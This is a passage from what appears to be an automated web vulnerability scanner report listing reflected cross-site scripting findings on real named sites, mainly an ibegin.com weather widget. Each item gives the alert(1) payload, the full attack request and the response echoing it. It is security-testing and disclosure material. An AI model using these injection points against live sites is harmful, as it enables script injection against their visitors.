User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; svariants=NA; ECOM_GTM=owaln_osaln; bn_u=6923522882713032529; op704wirelesssearchlandingpage1gum=a005005004274ri19c6a28261; DTAB=Tab=Bus; colam_ctn=l%3Den_US; browserid=A001533839947

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 01 May 2011 23:37:46 GMT
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 01 May 2011 23:37:46 GMT
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=XYNLIASLF0LPVB4U3SIB5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207601953; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=19f0450799003a67ffb066dd0f0d8e8b; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
-Category&repoitem=threat-vulnerability-management&serv_port=network-security&serv_fam=threat-vulnerability-management&segment=ent_biz&lastrule=true&GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1&4bdf4--><script>alert(1)</script>c023ff8d913=1 -->
...[SNIP]...
7.45. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5743<script>alert(1)</script>01a55c78f8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa5743<script>alert(1)</script>01a55c78f8d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:27 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15660
X-Varnish: 542435555
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
<strong> Unable to resolve the request "favicon.icoa5743<script>alert(1)</script>01a55c78f8d".</strong>
...[SNIP]...
7.46. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the background_color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 69b10%3balert(1)//368093ffe90 was submitted in the background_color parameter. This input was echoed as 69b10;alert(1)//368093ffe90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff69b10%3balert(1)//368093ffe90&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:49 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff69b10;alert(1)//368093ffe90-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="backgrou
...[SNIP]...
7.47. http://www.ibegin.com/weather/weather_widget.php [border_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the border_color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c8f80%3balert(1)//21c5509fcb6 was submitted in the border_color parameter. This input was echoed as c8f80;alert(1)//21c5509fcb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000c8f80%3balert(1)//21c5509fcb6&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000c8f80;alert(1)//21c5509fcb6-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; colo
...[SNIP]...
7.48. http://www.ibegin.com/weather/weather_widget.php [border_width parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the border_width request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 285e6%3balert(1)//e4c184846bc was submitted in the border_width parameter. This input was echoed as 285e6;alert(1)//e4c184846bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1285e6%3balert(1)//e4c184846bc&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:52:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1285e6;alert(1)//e4c184846bc-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #fffff
...[SNIP]...
7.49. http://www.ibegin.com/weather/weather_widget.php [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the city request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f10bd%3balert(1)//60cfe65333b was submitted in the city parameter. This input was echoed as f10bd;alert(1)//60cfe65333b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Restonf10bd%3balert(1)//60cfe65333b&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-restonf10bd;alert(1)//60cfe65333b-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div st
...[SNIP]...
7.50. http://www.ibegin.com/weather/weather_widget.php [color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the color request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2dbae%3balert(1)//5b07d7be905 was submitted in the color parameter. This input was echoed as 2dbae;alert(1)//5b07d7be905 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=0000002dbae%3balert(1)//5b07d7be905&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:39 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-0000002dbae;alert(1)//5b07d7be905-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-colo
...[SNIP]...
7.51. http://www.ibegin.com/weather/weather_widget.php [country parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the country request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31206%3balert(1)//199a4fe5d1a was submitted in the country parameter. This input was echoed as 31206;alert(1)//199a4fe5d1a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us31206%3balert(1)//199a4fe5d1a&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us31206;alert(1)//199a4fe5d1a-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

documen
...[SNIP]...
7.52. http://www.ibegin.com/weather/weather_widget.php [current parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the current request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bf0d4%3balert(1)//11ce2c9a945 was submitted in the current parameter. This input was echoed as bf0d4;alert(1)//11ce2c9a945 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1bf0d4%3balert(1)//11ce2c9a945&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:47:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1bf0d4;alert(1)//11ce2c9a945-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style=
...[SNIP]...
7.53. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the font_family request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 33d1e%3balert(1)//6ffbaad9015 was submitted in the font_family parameter. This input was echoed as 33d1e;alert(1)//6ffbaad9015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana33d1e%3balert(1)//6ffbaad9015&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:44 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
tice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana33d1e;alert(1)//6ffbaad9015-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color: #000000;
...[SNIP]...
7.54. http://www.ibegin.com/weather/weather_widget.php [font_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the font_size request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5e6df%3balert(1)//029aa189bd3 was submitted in the font_size parameter. This input was echoed as 5e6df;alert(1)//029aa189bd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=115e6df%3balert(1)//029aa189bd3&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:53:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-115e6df;alert(1)//029aa189bd3-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color:
...[SNIP]...
7.55. http://www.ibegin.com/weather/weather_widget.php [forecast parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the forecast request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload fc4a7%3balert(1)//f9c3e7421 was submitted in the forecast parameter. This input was echoed as fc4a7;alert(1)//f9c3e7421 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1fc4a7%3balert(1)//f9c3e7421&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:47:57 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1558


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1fc4a7;alert(1)//f9c3e7421-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="b
...[SNIP]...
7.56. http://www.ibegin.com/weather/weather_widget.php [padding parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the padding request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3993a%3balert(1)//19a959291cc was submitted in the padding parameter. This input was echoed as 3993a;alert(1)//19a959291cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=103993a%3balert(1)//19a959291cc&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:51:22 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1589


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-103993a;alert(1)//19a959291cc-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #fff
...[SNIP]...
7.57. http://www.ibegin.com/weather/weather_widget.php [showicons parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the showicons request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3eb8b%3balert(1)//795fc0174d6 was submitted in the showicons parameter. This input was echoed as 3eb8b;alert(1)//795fc0174d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=13eb8b%3balert(1)//795fc0174d6 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line
...[SNIP]...
ce: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-1-1-1-ffffff-000000-175-10-1-000000-11-verdana-13eb8b;alert(1)//795fc0174d6-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div style="background-color: #ffffff; color: #000000; w
...[SNIP]...
7.58. http://www.ibegin.com/weather/weather_widget.php [smallicon parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the smallicon request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 7f9f8%3balert(1)//d9661db8ae5 was submitted in the smallicon parameter. This input was echoed as 7f9f8;alert(1)//d9661db8ae5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=17f9f8%3balert(1)//d9661db8ae5&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:46:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1562


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Warning: readfile(widget_cache/js-us-virginia-reston-17f9f8;alert(1)//d9661db8ae5-1-1-ffffff-000000-175-10-1-000000-11-verdana-1-f.txt): failed to open stream: No such file or directory in /home/ibegin.com/public_html/weather/weather_widget.php on line 72

document.write('<div styl
...[SNIP]...
7.59. http://www.ibegin.com/weather/weather_widget.php [state parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The value of the state request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6d844%3balert(1)//2cee12dca9c was submitted in the state parameter. This input was echoed as 6d844;alert(1)//2cee12dca9c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia6d844%3balert(1)//2cee12dca9c&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
